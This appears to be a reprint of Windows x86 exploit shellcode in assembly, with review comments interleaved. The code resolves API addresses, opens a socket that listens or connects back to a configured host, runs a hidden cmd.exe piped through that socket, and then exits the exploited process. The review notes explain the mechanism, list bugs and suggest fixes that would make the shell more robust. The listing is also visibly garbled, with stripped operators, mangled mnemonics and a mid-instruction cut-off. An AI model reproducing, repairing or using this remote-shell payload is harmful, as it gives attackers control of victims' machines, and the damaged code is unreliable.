Finish_Convert_Next_Bit; shl eax, 8; push ecx; pop. 
Ebx; Inc EDX; JMP _CONVERT_BX_TO_AL_SHORTFINISH_CONVERT_NEXT_BIT: POP EDX; POP ECX; POP EBX; ret; run_actual1: jmp run_actual2;; // get the address SkOverflowFuncAddr from szShellNeedFunc; // void _Get_Overflow_Addr_From_Shell_Func (void * SkOverflowFuncAddr,; // char * ShellNeedFuncStr,; // DWORD dwGetModuleHandleAddr,; // DWORD dwGetProcAddr); _Get_Overflow_Addr_From_Shell_Func: push ebp (Push ESI; PUSH EDI; PUSH EDX; PUSH ECX; PUSH EBX; PUSH EX; MOV EDI, FUNC_PARAM_1; // First Parameter MOV ESI, FUNC_PARAM_2; // 2nd parameter xor EBX, EBX ; xor ecx, ecx; mov cl, SHELL_NEED_FUNC_BODY_OFFSET; add esi, ecx; // esi = szShellCodeNeedFunc SHELL_NEED_FUNC_BODY_OFFSET mov cl, byte ptr [esi]; inc esi; _NextDllNameToLoad: push ecx; mov bl, byte ptr [esi]; inc ESI; // Skip size. push ESI; MOV EAX, FUNC_PARAM_3; // 3rd parameters.; // Mov Eax, getModuleHandlea_addr; // getModuleHandlea Call Eax; add esi, ebx; // Go to Next Add RESS.; now, ESI points to the number of functions. XOR ECX, ECX; MOV CL, BYTE PTR [ESI]; Inc ESI; / / Today, LOAD Each Function._NextFunction_Addr: Push Ecx; // Take strings Size MOV BL, BYTE PTR [ESI]; Inc ESI; Push Eax; Push ESI; Push ESI; // Procname Push ESI; // Module MoV ECX, FUNC_PARAM_4; // The third parameter.; // Mov Eax, GetModuleHandlea_addr; // getModuleHandlea Call ECX; MOV DWORD PTR [EDI], ES; Add EDI, 4; POP ESI; POP Eax; Add ESI, EBX; / / Pointer Moves to the next string. Pop Ecx; loop _nextFunction_addr; POP ECX; loop _nextdllnametoload; pop EX; POP EBX; POP ECX; POP EDX; POP EDI; POP ESI; POP EBP; RUN_ACTUAL2: JMP RUN_ACTUAL3_1;; // Create a jacket, listen to a port, return to the jacket. ; // SOCKET _Create_Bind_Connect_Socket_To_Port (SkOverflowFuncAddr * pFuncAddr, szShellNeedFunc * pNeedFunc); _ Create_Bind_Connect_Socket_To_Port: push ebp; mov ebp, esp; xor eax, eax; // open 0xff (256) a byte variable region mov ax, 3f0h sub esp, eax. 
Push ESI; PUSH EDI; PUSH EDX; PUSH ECX; PUSH EBX; MOV ESI, FUNC_PARAM_1; // First parameter.; // WSAStartup (Werd, & WSD); Lea EDI, [EBP-340H]; // Open Space for temporary variables. Xor Eax, Eax; MOV Al, 2; Push EDI; Push Eax; Mov Eax, [ESI SkoverflowFuncaddr.wsastartup]; Call Eax;; // msocket = Socket (AF_INET, SOCK_STREAM, 0); = (2, 1, 0) xor Eax, Eax; Push Eax; Inc Eax; Push Eax; Inc Eax; Push Eax; MOV Eax, [ESI SkoverflowFuncaddr.socket]; Call Eax; // Take the Type MOV EDX , Func_param_2; lea ebx, [edx stconnectinfo.byconnecttype]; MOV CL, BYTE PTR [EBX]; PUSH EAX;; // Preparing parameter sockaddr_in lea EDI, [EBP-0F0H]; // is now the address of SockAddr_in. LEA EBX, [EDI SOCKADDR_IN.SIN_FAMILY]; XOR Eax, Eax; MOV Al, 2; MOV Word PTR [EBX], AX; //SockAddr_in.sin_family = AF_INET POP EAX;; // Now register status ..; // edi --- Temporary variable SockAddr_in, (SIN_FAMILY = AF_INET is assigned); // EDX - - Parameter 2 stconnectinfo link information; // eax --- created jacket newsocket.; // ESI --- Parameter 1 SkoverflowFuncaddr function address. CMP CL, 1; // Is it listening? Jne _isconnectToip; // no Jump. Push Eax; // <-2 @; // Get port value. Push Eax; // <-1 @ MOV Eax, [EDX stconnectinfo.dwlistenport]; call _convert_sk_long_to_ansi_word; MOV ECX, EAX; XCHG ch , cl; // port = htons (port) POP EAX; / / -> 1 @ lea ebx, [EDI SOCKADDR_IN.SIN_PORT]; MOV EDX, FUNC_PARAM_2; // 2nd parameter. MOV Word PTR [EBX], CX; //sockaddr_in.sin_port = Port. xor Eax, Eax; Lea EBX, [EDI SOCKADDR_IN.SIN_ADDR]; MOV DWORD PTR [EBX], EAX; //sockaddr_in.sin_addr.s_un.s_addr = inaddr_any pop eax; // -> 2 @ push eax; // <- 3 @; // bind (msocket, (sockaddr *) & addrin, sizeof (addrin)); xor ECX, ECX; MOV CL, Size SockAddr_in; Push Ecx; Push EDI; Push Eax; Mov Eax, [ESI SkoverflowFuncaddr.bind]; Call Eax; // The following jump is used to eliminate the distance that is too far from the distance. 
JMP _TEMP_1; Run_Actual3_1: JMP Run_Actual3_2; _Temp_1: Pop Eax; // -> 3 @ push eax; // <- 4 @; // listen (msocket, 1); xor ECX, ECX; Inc ECX; PUSH ECX; Push Eax; Mov Eax, [ESI SkoverflowFuncaddr.Listen]; Call EAX Pop Eax; // -> 4 @ push eax; // <- 5 @; // newsocket = accept (msocket, (sockaddr *) & addrin, & ilen); XOR ECX, ECX; MOV CL, SIZE SOCKADDR_IN; LEA EDI , [EBP-0C0H]; MOV [EDI], ECX; Push EDI; // Ilen = SizeOf (AddRIN); Lea EDI, [EBP-0F0H]; Push EDI; // & SockAddr_in structure. Push Eax; MOV Eax, [ ESI SKOVERFLOWFUNCADDR.ACCE Pt]; Call Eax; Pop Edx; // -> 5 @ // Used to Listen's Socket. By Eax-> Edx Push Eax; // <- 6 @ // Get new connecting tubes ..; // Close to Listen Socket.; // CloseSocket (Msocket); Push Edx; Mov Eax, [ESI SKOVERFLOWFUNCADDR.CLOSESSOCKET]; Call Eax; Pop Eax; // -> 6 @ Cmp Eax, -1; JE wsocket_quitrightnow; JMP finish_get_connection_socket; _IndnectToip:; // Connect to an IP: port; // addrin.sin_family = AF_INET; / / addrin.sin_addr.s_un.s_addr = 0x0100007f;; // addrin.sin_port = 0x8b; // 139.; // Connect (socket, (socket, (sockaddr *);; // Prepare parameter sockaddr_in; // current register status ..; // EDI --- Temporary variable sockaddr_in, (sin_family = AF_INET is assigned); // EDX --- Parameter 2 STCONNECTINFO link information; // Eax --- created jacket newsocket.; // ESI --- parameter 1 SkoverFlowFuncaddr function address.; // Get port value. Push Eax; // <- 1 @ MOV EAX, [EDX stconnectinfo.dwconnectport]; call _inter_sk_long_to_ansi_word; MOV ECX, EAX; XCHG ch, cl; // port = HTONS (port) Lea EBX, [EDI SOCKADDR_IN.SIN_PORT]; MOV Word PTR [EBX], CX; //sockaddr_in.sin_port = port.; // The following jump is used to eliminate the distance from the distance. It did not affect the source code jmp _temp_1_1; run_actual3_2:. 
jmp run_actual3; _temp_1_1: mov eax, [edx stConnectInfo.dwIP1]; call _convert_Sk_Long_To_Ansi_Word; mov ecx, eax; shl ecx, 10h; mov eax, [edx stConnectInfo.dwIP2 ]; call _convert_Sk_Long_To_Ansi_Word; mov cx, ax; lea ebx, [edi SOCKADDR_IN.sin_addr]; mov dword ptr [ebx], ecx; //SOCKADDR_IN.sin_addr.S_un.S_addr = stConnectInfo.dwIP1 dwIP2 pop eax; // -> 1 @ push eax; // <- 2 @; // connect (msocket, addr, 0x10); xor ECX, ECX; MOV CL, 10H; Push E Cx; // sizeof; push edi; // sockaddr * push eax; // msocket. Mov Eax, [ESI SKOVERFLOWFUNCADDR.CONNECT]; CALL EAX; // connect. MOV ECX, EAX; POP EAX; / .. / -> 2 @ jcxz Finish_Get_Connection_Socket; // connect success nop;; // now, connect failure; // closesocket (eax) push eax; mov eax, [esi SkOverflowFuncAddr.closesocket]; call eax; xor eax, eax; jmp WSocket_QuitRightNow; Finish_Get_Connection_Socket: push eax; push eax; pop edx; // edx = eax; // setsockopt (newsocket, SOL_SOCKET, SO_RCVTIMEO, (LPCTSTR) & iLen, sizeof (iLen)); lea edi, [ebp-0f0h ]; XOR EAX, EAX; MOV Al, 1; MOV [EDI], EAX; SHL EAX, 2; // EAX = 4 Push Eax; Push EDI; MOV AX, SO_RCVTIMEO; Push Eax; MOV AX, SOL_Socket; Push Eax; Push EDX; MOV Eax, [ESI SkoverflowFuncaddr. Setsockopt]; Call EAX; Pop Eax; wsocket_quitrightnow:; // Return the result. 
; NOTE(review): the first run of pops below is the tail of _Create_Bind_Connect_Socket_To_Port
; (its head is above this chunk).  No `ret` is visible between `POP EBP` and RUN_ACTUAL3 in this
; reprint; presumably lost in transcription -- confirm against the original .asm.
; NOTE(review): the RUN_ACTUALn labels form a chain of forward `jmp`s that hop over each helper
; to reach RUN_ACTUAL (the entry point).  The "distance too far" remarks suggest every hop was
; kept inside short-jump (rel8) range; a rel32 jmp would encode NUL bytes -- inference, not shown.
; NOTE(review): the `+` operator appears to have been stripped throughout this reprint
; (`[EDI Shell_CMD_PIPE.NSTARTUPINFO]` was presumably `[EDI+Shell_CMD_PIPE.NSTARTUPINFO]`);
; restore it before trying to reassemble.  `PUSH EX` is a garbled `PUSH EAX`.
;
; _Create_Process_To_Handle(pFuncAddr, pCmdPipe, pStrCmd):
;   zeroes pCmdPipe->nStartupInfo, sets cb, sets dwFlags=101h
;   (STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES, wShowWindow stays 0 = SW_HIDE), wires
;   hStdInput/hStdOutput to the child ends of the two pipes, duplicates the stdout end into
;   hStdError, calls CreateProcessA(NULL, pStrCmd, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi)
;   and finally closes the parent's copies of the child ends.
;   The return value of CreateProcessA is NOT checked; on failure the caller still enters the
;   socket pump and later calls TerminateProcess on whatever hProcess then holds.
POP EBX; POP ECX; POP EDX; POP EDI; POP ESI; MOV ESP, EBP; POP EBP; RUN_ACTUAL3: JMP RUN_ACTUAL4_1;; on the sleeve pipe, running processes pStrCmd;; // _ Create_Process_To_Handle (SkOverflowFuncAddr * pFuncAddr, Shell_Cmd_Pipe * pCmdPipe, LPCTSTR * pStrCmd); _ Create_Process_To_Handle: push ebp; mov ebp, esp; push edi; push esi; push edx; push ecx; Push EBX; PUSH EX; MOV EDI, FUNC_PARAM_2; // shell_cmd_pipe * pcmdpipedata; Push EDI; POP EDX; // EDX = EDI;; // MEMSET (& Si, 0, Sizeof (StartupInfo); xor Eax, Eax; LEA EDI, [EDI Shell_CMD_PIPE.NSTARTUPINFO]; Push EDI; // EDI = & Startupinfo; --- XOR ECX, ECX; MOV CL, SIZE STARTUPINFO; REP Stosb; Pop Edi; // ---; // si.cb = sizeof (startupinfo); Lea ESI, [EDI Startupinfo.cb]; MOV CL, SIZE Startupinfo; MOV [ESI], ECX;; // si.wshowwindow = sw_hide = 0; // need to do nothing; // si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;. lea esi, [edi STARTUPINFO.dwFlags]; mov cx, 101h; mov [esi], ecx;; // si.hStdInput = ShellStdinPipe; Push EDI; Lea EDI, [EDI Startupinfo.hstdinput]; Lea ESI, [EDX shell_cmd_pipe.shellstdinpipe]; MOV Eax, [ESI]; MOV [EDI], EAX; Pop Edi;; // si.hstdputput = shellstdoutpipe Push EDI; Lea EDI, [EDI Startupinfo.hstdoutput]; Lea ESI, [EDX Shell_CMD_PIPE.SHELLSTDOUTPIPE]; MOV EAX, [ESI]; MOV [EDI], EAX; Pop Edi;; // DuplicateHandle (GetCurrentProcess (), ShellStdoutPipe, getCurrentProcess (),; // & (si.hstderror), duplicate_same_access, true, 0);
; NOTE(review): DuplicateHandle argument order.  Pushed right-to-left below: dwOptions=0,
; bInheritHandle=1, dwDesiredAccess=2, lpTargetHandle=&si.hStdError, hTargetProcess, then (next
; line) hSourceHandle=ShellStdoutPipe, hSourceProcess.  DUPLICATE_SAME_ACCESS (2) is a dwOptions
; flag, but here the 2 lands in dwDesiredAccess and dwOptions is 0 -- the original comment says
; the opposite.  This only works if access mask 2 happens to suffice for the child's stderr
; writes; verify, or swap the two pushes so that dwOptions=2 and dwDesiredAccess=0.
MOV esi, FUNC_PARAM_1; mov eax, [esi SkOverflowFuncAddr.GetCurrentProcess]; call eax; xor ecx, ecx; push ecx; // 0 inc ecx; push ecx; // TRUE inc ecx; push ecx; // DUPLICATE_SAME_ACCESS lea edx, [edi STARTUPINFO.hStdError]; push edx; //&(si.hStdError) push eax; // GetCurrentProcess (); push esi; mov esi, FUNC_PARAM_2; lea esi, [esi Shell_Cmd_Pipe.ShellStdoutPipe]; mov ebx, [ESI]; POP ESI; // The following jump is used to eliminate the distance caused by too far. The code does not affect the source program. 
JMP _TEMP_2; Run_Actual4_1: JMP Run_Actual4; _Temp_2: Push Ebx; // shellstdoutpipe Push Eax; // getCurrentProcess (); MOV Eax, [ESI SkoverflowFuncaddr.duplicateHandle]; Call Eax;
; NOTE(review): CreateProcessA takes 10 arguments, pushed right-to-left below
; (&pi, &si, NULL, NULL, 0, TRUE, NULL, NULL, lpCommandLine, NULL); `incov` is a garbled
; `inc eax`.  Nothing tests the result; a failed CreateProcessA is silently ignored.
; The two CloseHandle calls release the parent's references to the child ends (ShellStdinPipe,
; ShellStdoutPipe); hProcess/hThread in ProcessInformation are never closed anywhere visible.
; The `_Close_All_Communication_Pipe` prologue that follows is garbled (`mov ebp , ESH ESI` is
; `mov ebp, esp; push esi`; `Push EX` is `push eax`).
; // CreateProcess (Null, "cmd.exe", null, null, true, 0,; //////// NULL, NULL, & si, & ProcessInformation) xor eax, eax; mov edi, FUNC_PARAM_2; lea edx, [edi Shell_Cmd_Pipe.ProcessInformation]; push edx;; // & ProcessInformation lea edx, [edi Shell_Cmd_Pipe.nstartupinfo]; push edx; ; // & si push Eax;; // null; push eax;; // null; push eax;; // 0; incov; push eax; // true; DEC EAX; push eax;; // null; Push eax;; // null; MOV EDX, FUNC_PARAM_3; Push EDX;; // lpctstr lpszcommand. push eax;; // null; MOV Eax, [ESI SkoverflowFuncaddr.createProcessa]; call eax; // CloseHandle (ShellStdinPipe); mov eax, [edi Shell_Cmd_Pipe.ShellStdinPipe]; push eax; mov eax, [esi SkOverflowFuncAddr.CloseHandle]; call eax;; // CloseHandle (ShellStdoutPipe); mov eax, [edi Shell_Cmd_Pipe .Shellstdoutpipe]; Push Eax; MOV Eax, [ESI SkoverflowFuncaddr.CloseHandle]; Call EX; POP EAX; POP EBX; POP ECX; POP EDX; POP ESI; POP EDI; MOV ESP, EBP; POP EBP; RET; // memset (& si, 0, sizeof (STARTUPINFO)); run_actual4: jmp run_actual5;; // Close the socket is no longer used; // _ Close_All_Communication_Pipe (SkOverflowFuncAddr * pFuncAddr, Shell_Cmd_Pipe * pCmdPipe); _ Close_All_Communication_Pipe: push ebp; mov ebp , ESH ESI; PUSH EDI; PUSH EDX; PUSH ECX; Push EBX; Push EX; MOV ESI, FUNC_PARAM_1; MOV EDI, FUNC_PARAM_2; // CloseSocket (msocket); MOV EAX, [EDI shell_cmd_pipe.msocket]; Push Eax; Mov Eax, [ESI SkoverflowFuncaddr.closeSocket]; Call Eax; // CloseHandle (Handle) .. Mov Eax, [EDI shell_cmd _Pipe.hreadpipe]; Push Eax; Mov Eax, [ESI SKOVERFLOWFUNCADDR.CLOSEHANDLE]; CALL EAX;; // CloseHandle (Handle) .. 
; NOTE(review): the statements up to the first `RET` are the tail of _Close_All_Communication_Pipe
; (closesocket(msocket), CloseHandle(hReadPipe), CloseHandle(hWritePipe)); `Call EX` is a
; garbled `Call EAX`.
;
; _Recv_Write_Socket_Pipe(pFuncAddr, pCmdPipe): the socket <-> cmd.exe I/O pump.
;   loop:  n = recv(msocket, szTemp, SIZE_OF_TEMP_BUFFER, 0)
;            n > 0          -> WriteFile(hWritePipe, szTemp, n)        (to cmd.exe stdin)
;            n == 0         -> leave loop (peer closed)
;            SOCKET_ERROR   -> GetLastError()==10060 (WSAETIMEDOUT) ? fall through : leave loop
;          PeekNamedPipe(hReadPipe) -> bytes available ? ReadFile + send(), repeat : back to recv
;   The SO_RCVTIMEO set in the connect helper above (value 1, i.e. apparently 1 ms) is what turns
;   the blocking recv into a poll; there is no Sleep, so the loop spins at that granularity.
;   dwBreak is set to 1 and never cleared in the visible code, so the `jz` on it is dead; the loop
;   ends only through the error/EOF branches.
;   Relies on GetLastError() returning the Winsock error (on NT-family Winsock2 WSAGetLastError is
;   the same call); `cmp ax, 10060` compares only the low 16 bits.
;   The comment "496bytes ... sztemp [240]" does not match `mov ax, 2f0h` (752); the real frame
;   layout is Recv_Write_Socket_Pipe_Data, which is not shown in this chunk.  `[? edx]` is `[edx]`.
Mov Eax, [EDI shell_cmd_pipe.hwritepipe]; Push Eax; Mov Eax, [ESI SkoverflowFuncaddr.CloseHandle]; Call EX; POP EAX; POP EBX; POP ECX; POP EDX; POP EDI; POP ESI; MOV ESP, EBP; POP EBP; RET; Run_ACTUAL5: JMP Run_Actual6_1;; // Accept the data of the pipe , written into the pipe, the read pipe, is sent to the socket; // _ Recv_Write_Socket_Pipe (SkOverflowFuncAddr * pFuncAddr, Shell_Cmd_Pipe * pCmdPipe); _ Recv_Write_Socket_Pipe:. push ebp; mov ebp, esp; xor eax, eax; mov ax, 2f0h; sub esp, eax ; // 496bytes, use for char sztemp [240]; push esi; push edi; push edx; push ecx; push ebx; mov esi, FUNC_PARAM_1; // SkOverflowFuncAddr * pAddr; mov edi, FUNC_PARAM_2; // Shell_Cmd_Pipe * pCmdPipeData;; // dwBreak = 1 lea edx, [ebp - size Recv_Write_Socket_Pipe_Data Recv_Write_Socket_Pipe_Data.dwBreak]; xor eax , eax; inc eax; mov [edx], eax;; // while (bBreak!) _While_Read_Data_Loop:; // monitor dwBreak == 0 lea edx, [ebp- size Recv_Write_Socket_Pipe_Data Recv_Write_Socket_Pipe_Data.dwBreak]; mov eax, [? edx]; test eax, eax; jz _Quit_While_Read_Data_Loop_1;; // iLen = recv (newsocket, szTemp, sizeof (szTemp) -1, 0); xor eax, eax; push eax; mov al, SIZE_OF_TEMP_BUFFER; push eax; lea eax , [ebp- size Recv_Write_Socket_Pipe_Data Recv_Write_Socket_Pipe_Data.szTemp]; push eax; lea ebx, [edi Shell_Cmd_Pipe.msocket]; mov eax, [ebx]; push eax; mov eax, [esi SkOverflowFuncAddr.recv]; call eax; CMP EAX, -1; JNE _NEXTSTEP_RECEIVE_TEST; PUSH EAX; Pop Edx; Mov Eax, [ESI SKOVERFLOWFuncadd r.GetLastError]; call eax; cmp ax, 10060; // timeout je _Read_StdoutPipe; _Quit_While_Read_Data_Loop_1:? jmp _Quit_While_Read_Data_Loop; //error._NextStep_Receive_Test: test eax, eax; // eax == 0 je _Quit_While_Read_Data_Loop; // break;? 
; NOTE(review): WriteFile below passes the recv length in eax unchanged; its result is tested and
; a failure (cmd.exe gone, pipe broken) ends the loop -- this is the only way a dead child is
; noticed on the input side.
JNG _READ_STDOUTPIPE ;; // Receive_ok_occure:; // if (Ilen> 0); // Writefile (HWritePipe, Sztemp, Ilen, & DWTEMP, NULL) xor Edx, EDX; Push Edx; // Null Lea EBX, [EBP- SIZE Recv_Write_Socket_Pipe_Data Recv_Write_Socket_Pipe_Data.dwTemp]; push ebx; // & dwTemp push eax; // iLen lea ebx, [ebp- size Recv_Write_Socket_Pipe_Data Recv_Write_Socket_Pipe_Data.szTemp]; push ebx; // szTemp; mov eax, [edi Shell_cmd_pipe.hwritepipe]; Push Eax; Mov Eax, [ESI SkoverflowFuncaddr.writefile]; Call Eax; Test Eax, Eax; JZ _Quit_While_Read_Data_LOOP; // WriteFile (.) == 0, failed, tube interrupt.; // The following jump is used to eliminate the distance from the distance. The code does not affect the source program. JMP _TEMP_3; Run_Actual6_1: JMP Run_Actual6; _Temp_3: _READ_STDOTPIPE:;
; NOTE(review): PeekNamedPipe(hReadPipe, NULL, 0, NULL, &dwTemp, NULL) -- its return value is
; ignored and dwTemp is not zeroed beforehand.  If the call fails (e.g. cmd.exe has exited and
; the write end is gone) dwTemp keeps whatever it held before, so the `jz _No_Data_To_Read_Yet`
; decision is made on stale data: a stale non-zero value makes the following ReadFile fail and
; end the loop, a stale zero keeps the loop spinning forever.  `test eax, eax` after the call and
; quit on 0.  `/ / NULL` is a garbled `// NULL`.
; // peeknamedpipe (hreadpipe, null, 0, null, & dwtemp, NULL); xor eax, eax; push eax; // NULL lea edx, [ebp- size Recv_Write_Socket_Pipe_Data Recv_Write_Socket_Pipe_Data.dwTemp]; push edx; // & dwTemp push eax; // NULL push eax; // 0 push eax; / / NULL mov eax, [edi Shell_Cmd_Pipe.hReadPipe]; push eax; // hReadPipe mov eax, [esi SkOverflowFuncAddr.PeekNamedPipe]; call eax; mov eax, [ebp- size Recv_Write_Socket_Pipe_Data Recv_Write_Socket_Pipe_Data.dwTemp]; test eax, eax; jz _No_Data_To_Read_Yet;; // ReadFile (hReadPipe, szTemp, sizeof (szTemp), & dwTemp, NULL) xor eax, eax; push eax; // NULL lea edx, [ebp- size Recv_Write_Socket_Pipe_Data Recv_Writ e_Socket_Pipe_Data.dwTemp]; push edx; // & dwTemp mov al, SIZE_OF_TEMP_BUFFER; push eax; // sizeof (szTemp); lea edx, [ebp- size Recv_Write_Socket_Pipe_Data Recv_Write_Socket_Pipe_Data.szTemp]; push edx; // szTemp; mov eax, [EDI shell_cmd_pipe.hreadpipe]; Push Eax; // HreadPipe Mov Eax, [ESI SKOVERFLOWFUNCADDR.READFILE]; CALL EAX; // readfile.; // if (readfile (...) == 0)? Then quit . 
; NOTE(review): send() below is checked only against SOCKET_ERROR; a short send is silently
; accepted and the remainder of szTemp is dropped.
test eax, eax; je _Quit_While_Read_Data_Loop;; // send (newsocket, szTemp, dwTemp, 0); xor eax, eax; push eax; // 0 mov eax, [ebp- size Recv_Write_Socket_Pipe_Data Recv_Write_Socket_Pipe_Data.dwTemp]; push eax ; // dwtemp; lea edx, [ebp- size Recv_Write_Socket_Pipe_Data Recv_Write_Socket_Pipe_Data.szTemp]; push edx; // szTemp; mov eax, [edi Shell_Cmd_Pipe.msocket]; push eax; // socket mov eax, [esi SkOverflowFuncAddr.send].; call eax; cmp eax, -1; je _Quit_While_Read_Data_Loop; jmp _Read_StdoutPipe; // continue to read next data._No_Data_To_Read_Yet: jmp _While_Read_Data_Loop; _Quit_While_Read_Data_Loop: pop ebx; pop ecx; pop edx; pop edi; pop esi; mov esp, ebp; pop ebp; ret; run_actual6: jmp run_actual;
; _Create_Two_Pipe(pFuncAddr, pCmdPipe): builds SECURITY_ATTRIBUTES{nLength=sizeof,
;   lpSecurityDescriptor=NULL, bInheritHandle=TRUE} at ebp-10h, then
;   CreatePipe(&hReadPipe, &ShellStdoutPipe, &sa, 0) and, on the next line of this listing,
;   CreatePipe(&ShellStdinPipe, &hWritePipe, &sa, 0).  Returns 1 on success, 0 on failure.
; NOTE(review): bInheritHandle is TRUE for BOTH ends of both pipes and CreateProcessA is called
; with bInheritHandles=TRUE, so cmd.exe also inherits the parent-side hReadPipe/hWritePipe.
; That is the classic "no EOF on the read pipe" pitfall; this code sidesteps it by polling with
; PeekNamedPipe and by TerminateProcess at the end, but a cleaner version would clear
; HANDLE_FLAG_INHERIT on the parent ends before CreateProcessA.
; NOTE(review): if the second CreatePipe fails, the two handles from the first one are leaked
; (moot here: the caller goes straight to ExitProcess).  `lpsecuri tyDescriptor` is a reprint
; artefact.
; // BOOL _Create_Two_Pipe (SkOverflowFuncAddr * pFuncAddr, Shell_Cmd_Pipe * pCmdPipe); _ Create_Two_Pipe: push ebp; mov ebp, esp; xor eax, eax; mov al, 0f0h; sub esp, eax; // Open space Push ESI; Push EDI; Push EDX; PUSH ECX; Push Ebx; MOV ESI, FUNC_PARAM_1; MOV EDI, FUNC_PARAM_2; XOR EBX, EBX; Lea EDI, [EBP-10H]; // SecurityAttributes.lpsecurityDescriptor = Null; // default acl lea edx, [EDI Security_Attributes.lpsecuri tyDescriptor]; mov [edx], ebx;; // SecurityAttributes.bInheritHandle = TRUE; // will inherit handle lea edx, [edi SECURITY_ATTRIBUTES.bInheritHandle]; inc ebx; mov [edx], ebx;; // SecurityAttributes. nLength = sizeof (SECURITY_ATTRIBUTES); lea edx, [edi SECURITY_ATTRIBUTES.nLength]; mov bl, size SECURITY_ATTRIBUTES; mov [edx], ebx; xor ebx, ebx;; // bResult = CreatePipe (& hReadPipe, & ShellStdoutPipe, & SecurityAttributes, 0 );. output into _FUNC_PARAM_2's variables push edi; // save push ebx;. // 0 push edi; // & SecurityAttributes mov edi, FUNC_PARAM_2; lea edx, [edi Shell_Cmd_Pipe.ShellStdoutPipe]; mov [edx], ebx; // ShellStdoutPipe = 0; push edx; // & ShellStdoutPipe lea edx, [edi Shell_Cmd_Pipe.hReadPipe]; push edx ;; // & hReadPipe mov eax, [esi SkOverflowFuncAddr.CreatePipe]; call eax; pop edi; // restore . 
; NOTE(review): the statements up to _Create_Pipe_Quit finish _Create_Two_Pipe (its head is on
; the previous line of this listing).  No `ret` is visible between `POP EBP` and RUN_ACTUAL in
; this reprint -- presumably lost in transcription; confirm against the original .asm.
test eax, eax; je _Create_Pipe_Quit_Error;; // Create Second Pipe;. // CreatePipe (& ShellStdinPipe, & hWritePipe, & SecurityAttributes, 0); xor ebx, ebx; push ebx; // 0 push edi; // & SecurityAttributes mov edi, FUNC_PARAM_2; lea edx, [edi Shell_Cmd_Pipe.hWritePipe]; push edx; // & hWritePipe lea edx, [edi Shell_Cmd_Pipe.ShellStdinPipe]; mov [edx], ebx; push edx; // & ShellStdinPipe mov eax, [esi SkOverflowFuncAddr .CreatePipe]; call eax; test eax, eax; je _Create_Pipe_Quit_Error; xor eax, eax; inc eax; jmp _Create_Pipe_Quit; _Create_Pipe_Quit_Error: xor eax, eax; jmp _Create_Pipe_Quit; nop; _Create_Pipe_Quit: pop ebx; pop ecx; pop edx; pop EDI; POP ESI; MOV ESP, EBP; POP EBP;
; RUN_ACTUAL: shellcode entry point (every RUN_ACTUALn jump above ends here).
;   1. `LEA ESI,[ESP]; MOV ESI,[ESI]` reads the return address on top of the stack.  Presumably
;      the stub reached this code via a `call` whose return address is the Call_back_data_Offset
;      label (see MyDataOffset below), so adding MYDATAOFFSET gives the address of the embedded
;      data block PC-relatively, with no fixups.  The comment "EBX is the address" is stale.
;   2. copies _Size_AllData bytes (connection info + import-name table + command line) to the
;      stack at ebp-SZSHELLNEDFUNC_OFFSET; ebp is assumed to be the frame set up by the overflow.
;   3. _Convert_Add_Sign_To_Null_Sign rewrites a placeholder byte to 0 throughout the copied
;      table.  Its literal prints as `' '` here; from the function name and the data table below
;      it was presumably '+' -- the usual trick for keeping NUL bytes out of the payload.
;   4. _Get_Overflow_Addr_From_Shell_Func resolves every import through the GetModuleHandleA /
;      GetProcAddress addresses stored at the end of the table (hard-coded; see the data block).
;   5. socket -> two pipes -> CreateProcessA(cmd line from the table) -> I/O pump ->
;      close socket/pipes -> TerminateProcess(hProcess) -> ExitProcess(0).
;      ExitProcess is called in the exploited host process, so a successful run also ends that
;      process (service impact); ExitProcess is also the only exit on the error paths.
; NOTE(review): transcription damage on these lines -- missing `+` operators, a missing `;`
; after `[esi 4]`, `addESP, 8` for `add esp, 8`.  Treat this as a reading aid, not as source.
RUN_ACTUAL: LEA ESI, [ESP]; MOV ESI, [ESI]; // EBX is the address XOR ECX, ECX; MOV CX, MYDATAOFFSET; Add ESI, ECX; // ESX is future data Address. // EBP-0x2FF, is the szshellneedfunc structure. Lea EDI, [EBP - SZSHELLNEDFUNC_OFFSET]; Push EDI; // mydebugadd ----- MOV CX, _Size_AllData; rep movsb; // also include connection The information structure of the information structure POP EDI; PUSH EDI; / / converts ' ' to "/ x00"; // void _convert_add_sign_to_null_sign (void * PTR, INT Ilen, DWORD DWOLD, DWORD DWNEW); xor ECX, ECX; Push ECX ; // - Parameter 4 MOV CL, ' '; Push ECX; // --- Parameter 3 MOV CX, _Size_szshellneedFunc; Push ECX; // --- Parameter 2 xor EBX, EBX; mov bl, String_Of_Data_Offset; add edi, ebx; // edi points to the real szShellNeedFunc push edi; // --- parameters 1 call _Convert_Add_Sign_To_Null_Sign; add esp, 10h;; // get the address SkOverflowFuncAddr from szShellNeedFunc; // void _Get_Overflow_Addr_From_Shell_Func ( SkOverflowFuncAddr * pSkOverflowFuncAddr, char * ShellNeedFuncStr, DWORD dwGetModuleHandleAddr, DWORD GetProcAddr) xor ecx, ecx; mov cx, _GetModuleHandle_Addr_Offset; mov esi, edi; add esi, ecx; mov eax, [esi 4] push eax;; // GetProcAddress_Addr mov eax, [esi]; push eax;; // GetModuleHandle_Addr push edi;; // ebp-0x1ff, the structure is SkOverflowFuncAddr lea 
esi, [ebp-SkOverflowFuncAddr_OFFSET];. push esi; call _Get_Overflow_Addr_From_Shell_Func; add esp, 10h; pop edi ;; // Create a socket, listening on a port / connection to a ip:. port, returns the sleeve; // SOCKET _Create_Bind_Connect_Socket_To_Port (SkOverflowFuncAddr * pFuncAddr, szShellNeedFunc * pNeedFunc); push edi; push esi; call _Create_Bind_Connect_Socket_To_Port; addESP, 8; Test Eax, EAX; JZ Main_quit_now; // Socket failed. Lea EDI, [EBP-shell_cmd_pipe_offset]; Lea EBX, [EDI shell_cmd_pipe.msocket]; MOV [EBX], EAX; // Save results to msocket in;. // BOOL _Create_Two_Pipe (SkOverflowFuncAddr * pFuncAddr, Shell_Cmd_Pipe * pCmdPipe);; // create two pipe, used to bind shell push edi;. push esi; call _Create_Two_Pipe; add esp, 8; test eax, eax; jz Main_Quit_Now;; // now is ok;. // on the sleeve pipe, running processes pStrCmd;; // _ Create_Process_To_Handle (SkOverflowFuncAddr * pFuncAddr, Shell_Cmd_Pipe * pCmdPipe, LPCTSTR * pStrCmd); lea edi, [ebp-szShellNeedFunc_OFFSET]; XOR EAX, EAX; MOV AL, STRING_OF_DATA_OFFSET; //cmd.exe command line offset in the data. Add Edi, Eax; Push EDI; // CMD.exe "pointer Lea EDI, [EBP-shell_cmd_pipe_offset]; Push EDI; Push ESI; Call 